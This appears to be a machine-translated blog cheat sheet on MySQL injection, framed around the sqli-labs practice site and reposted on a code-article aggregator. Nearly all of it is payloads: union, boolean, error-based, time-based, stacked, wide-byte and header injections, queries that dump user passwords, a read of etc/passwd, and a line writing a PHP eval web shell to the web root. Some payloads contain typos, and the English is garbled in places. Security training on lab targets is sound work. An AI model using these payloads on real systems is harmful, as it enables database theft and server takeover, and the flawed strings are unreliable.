MySQL injection summary

Others 2019-09-18 01:58:20 views: null

The difference between 0x01 MySQL 5.0 and MySQL 5.0 or more of the following versions

MySQL5.0 above there is a named information_schemadatabase, which stores all the information in the database, which holds information on all other databases on the MySQL server maintenance. Such as database name, table, table column data types and access to the database and so on. And 5.0 or less no.

information_schema

System database, database records current database, tables, columns, user rights information

SCHEMATA

Mysql store all the basic information database, comprising the database name, path, etc. encoding type.

Query the database:http://localhost/sqli-labs/Less-2/index.php?id=-1 union select 1,2,group_concat(schema_name) from information_schema.schemata #

TABLES

Information stored in the mysql table, including the table is a base table or system tables, database engine, what is the number of table rows, creation time, last updated time.

Look-up table security library:http://localhost/sqli-labs/Less-2/index.php?id=-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security' #

COLUMNS

Mysql table storing column information, including information on all of the columns and each column of the table, the first column of the table columns, the column data type, coding type of the column, the column authority, the comment column and the like.

Column of the table query usershttp://localhost/sqli-labs/Less-2/index.php?id=-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' #

General information and statements 0x02

Current users: user ()

Database version: version ()

Database Name: database ()

Operating system: @@ version_compile_os

The basic flow injection manual 0x03

3.1 Gets the number of fields

order by n

3.2 Acquisition System database name

select 1,2,schema_name from information_schema.schemata

3.3 Get the current database name

select 1,2,3,database()

3.4 get the database table

select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()

or:

select 1,2,table_name from information_schema.tables where table_schema=database() limit 0,1

3.5 get the table field

select 1,2,group_concat(column_name) from information_shema.columns where table_schema=database() and table_name='users'

3.6 to get the value of each field

select 1,group_concat(username,password) from users

Read 3.7 files

select load_file('etc/passwd')

Prerequisites:

    1. Current permissions on the file readable

    2. File on the server

    3. Path complete

    4. File size less than max_allowed_packet

    5. The current database user privileges FILE

    6. secure_file_priv is empty, if the value is a directory, then it can only operate on the file directory

 

3.8 write file

select '<?php @eval($_POST[c];)?> intofile '/var/www/html/shell.php'

Prerequisites:

    1. Target directory must be writable

    2. The current database user must have FILE privileges

    3. Destination file can not already exist

    4. secure_file_priv is empty

Path complete

0x04 common injection method

4.1 union injection

The role of the union is a joint two sql statements. When the injection parameter data does not exist in the database, two joint sql statement, the contents of the previous statement selected is empty, the query statement of contents of the back can be displayed.

such as:

id=-1’ union select 1,2'

4.2 Boolean injection

Using the logical judgment

    • left(database(), 1) > 's'

    • ascii(substr((select table_name from information_schema.tables where tables_schema=database() limit 0,1),1,1))=101 --+

    • ascii(substr((select database()), 1,1))=98

    • ord(mid(select infull(cast(username as char), 0x20) from security.users ORDER BY id LIMIT 0,1), 1,1))>98%23

      Explain: mid (a, b, c) starting from the position b, taken a bit string c Ord () function with the ascii (), the value of the character to ascii 

    • regexp regular injection

      select user() regexp '^[a-z]'

    • like matching injection

      select user() like 'ro%'

4.3 error injection

Payload structure so that information via error messages echoing out through the  Floor , updatexml , ExtractValue , NAME_CONST , Error based Double Query Injection and other methods.

    • floor

      union select 1, count(*), concat(0x3a, 0x3a, (select user()), 0x3a, 0x3a, floor(rand(0)*2)) as a from information_schema.columns group by a

    • UpdatXml (having a length limit, maximum 32)

      ?id=1 and updatexml(1, concat(0x7e, (select @@version), 0x7e),1)

    • ExtractValue (having a length limit, maximum 32)

      ?id=1 and extractvalue(1, concat(0x7e, (select @@version),0x7e))

    • NAME_CONST

      ?id=261 and 1=(select * from (select NAME_CONST(version(),1),NAME_CONST(version(),1)) as x)

    • Error based Double Query Injection

      ?id=1 or 1 group by concat_ws(0x7e,version(),floor(rand(0)*2)) having min(0) or 1

    • exp (5.5.5 above)

      id=1 and (select exp(~(select * from(select user())x)))

    • polygon

      id=1 and polygon((select * from(select * from(select user())a)b))

4.4 injection time

Delay Injection

?id=1 and if(ascii(substr(database(),1,1))>115, 1, sleep(5))

4.5 stacked query injection

Stack inquiry injected with Union query or query all the difference in the Union with a statement, the latter two execution is limited and can only be used to execute a query, can be injected into stacked execute arbitrary statement.

such as:

Oracle stack injection can not be used

id = 1';select if(substr(user(),1,1)='r', sleeep(3),1)%23

4.6 secondary injection

  How it works: The first time the database to insert the data, just use addslashesor by means of get_magic_quotes_gpcspecial characters which were escaped, but when written to the database or keep the original data. For example, the input parameters are  '  , addslashesuse After the escape, will not be inserted into the database, the database is retained ' .

  After the database is stored into the database, developers default data is authentic, the next time the need for a query, remove the dirty data directly from the database, no further testing and treatment, this will cause the SQL secondary injection.

4.7 byte wide injection

Use conditions:

    • Query parameter is surrounded by single quotes, passed in single quotation marks escaped operations

    • GBK is encoded in the database

      id=-1%df' union select 1, user(),3%23

      Under these conditions, single quote 'be escaped as% 5c, so constitutes% df% 5c, while at GBK encoding,% df% 5c is a traditional Chinese characters, "even", the single quotation marks successful escape.

4.8 cookie injection

Cookie: id=1 and 1=1

4.9 base64 injection

Base64 encoding of the parameters, and then sends a request

4.10 XFF injection

XFF (X-Forward-For), referred XFF head, it represents a real client ip address

X-Forward-For:127.0.0.1' select 1,2,user()

reference

SQL injection summary

SQL injection memorandum

Guess you like

Origin www.cnblogs.com/khuntor/p/11526248.html
Recommended
NetBSD bans submission of code generated by AI
Ranking
Talk dubbo of LRUCache
Chapter 1 Learning Summary
Introduction to Virtualization
pytorch 调用lstm
Six modules
[8086] The natural number of 1 to 36 into a 6x6 two-dimensional array of line-sequentially, and then print out the lower left half of the triangular array
mybatis mapper mapping file $ # {} {} understanding and
C language input and output buffer
c language floating-point input and output
andorid P version compatible, refer to Huawei
Daily
More
2024-05-18(31)
2024-05-17(6)
2024-05-16(23)
2024-05-15(5)
2024-05-14(9)
2024-05-13(8)
2024-05-12(28)
2024-05-11(32)
2024-05-10(34)
2024-05-09(32)

Code World

© 2018 codetd.com